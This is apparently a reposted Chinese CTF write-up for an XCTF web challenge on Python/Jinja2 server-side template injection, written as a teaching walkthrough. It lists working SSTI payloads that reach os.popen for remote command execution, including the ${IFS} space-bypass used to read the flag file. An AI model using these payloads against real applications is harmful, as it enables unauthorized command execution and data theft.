首页 最新 热门 推荐

  • 首页
  • 最新
  • 热门
  • 推荐

攻防世界 - Web - Level 2 | Web_python_template_injection

  • 25-02-16 18:01
  • 3565
  • 12347
blog.csdn.net

关注这个靶场的其它相关笔记:攻防世界(XCTF) —— 靶场笔记合集-CSDN博客

0x01:考点速览

本题考察的是 Python 的 SSTI 漏洞,可以参考下面两篇文章:

  • Python 模板注入(SSTI)深入学习

  • 细说 Jinja2 之 SSTI & bypass

0x02:Write UP

进入靶场,可以看到页面显示 “python template injection”,提示说本关考察的是 Python 的 SSTI 漏洞:

既然是考察的 SSTI,我们就得首先找到可注入的点,输入 /robots.txt,可以看到,其页面会将我们输入的内容返回回来:

那我们修改 Payload 为 {{1-1}} ,可以看到,其返回回来的是执行完后的结果,证明我们传入的信息会被执行:

那么下面就简单了,就是 SSTI 的流程。因为 Python 所有类的基类都是 Object(Flask 框架是 Python 的哦),所以 SSTI 实际上就是通过数据类型的父类找到 Object 类,然后再找到 Object 类衍生出来的可以执行文件读取或者命令执行的函数(有点抽象,可以去看看上面提供的参考文章,自己做个推导就好)。

传入如下 Payload 拿到当前类的继承顺序:

 /{{''.__class__.__mro__}}

然后通过 __subclasses__ 查找基类的所有子类:

 /{{''.__class__.__mro__[-1].__subclasses__()}}

上面那个 Payload 定位到了 Object 类下的所有子类,那么下面我们就要去实例化这些类并且通过 __globals__ 方法查看这些实例化的对象中有无 OS 或者 File 相关的方法(可以通过 Fuzz):

 /{{''.__class__.__mro__[-1].__subclasses__()[0].__init__.__globals__}}

成功定位到可以执行 OS 命令的子类后,以下就是我们执行命令的 Payload:

 {{''.__class__.__mro__[-1].__subclasses__()[204].__init__.__globals__["os"]["popen"]("whoami").read()}}

然后后面就是找 Flag 啦,使用 ls 命令查看当前目录下的文件:

 /{{''.__class__.__mro__[-1].__subclasses__()[204].__init__.__globals__["os"]["popen"]("ls").read()}}

然后读取 Flag,这里笔者使用了 ${IFS} 替代了空格在 Linux 系统上执行命令,如下,成功拿到了 Flag:

 /{{''.__class__.__mro__[-1].__subclasses__()[204].__init__.__globals__["os"]["popen"]("cat${IFS}fl4g").read()}}

注:本文转载自blog.csdn.net的Blue17 :: Hack3rX的文章"https://blog.csdn.net/m0_73360524/article/details/144805300"。版权归原作者所有,此博客不拥有其著作权,亦不承担相应法律责任。如有侵权,请联系我们删除。
复制链接
复制链接
相关推荐
发表评论
登录后才能发表评论和回复 注册

/ 登录

评论记录:

未查询到任何数据!
回复评论:

分类栏目

后端 (14832) 前端 (14280) 移动开发 (3760) 编程语言 (3851) Java (3904) Python (3298) 人工智能 (10119) AIGC (2810) 大数据 (3499) 数据库 (3945) 数据结构与算法 (3757) 音视频 (2669) 云原生 (3145) 云平台 (2965) 前沿技术 (2993) 开源 (2160) 小程序 (2860) 运维 (2533) 服务器 (2698) 操作系统 (2325) 硬件开发 (2491) 嵌入式 (2955) 微软技术 (2769) 软件工程 (2056) 测试 (2865) 网络空间安全 (2948) 网络与通信 (2797) 用户体验设计 (2592) 学习和成长 (2593) 搜索 (2744) 开发工具 (7108) 游戏 (2829) HarmonyOS (2935) 区块链 (2782) 数学 (3112) 3C硬件 (2759) 资讯 (2909) Android (4709) iOS (1850) 代码人生 (3043) 阅读 (2841)

热门文章

101
推荐
关于我们 隐私政策 免责声明 联系我们
Copyright © 2020-2025 蚁人论坛 (iYenn.com) All Rights Reserved.
Scroll to Top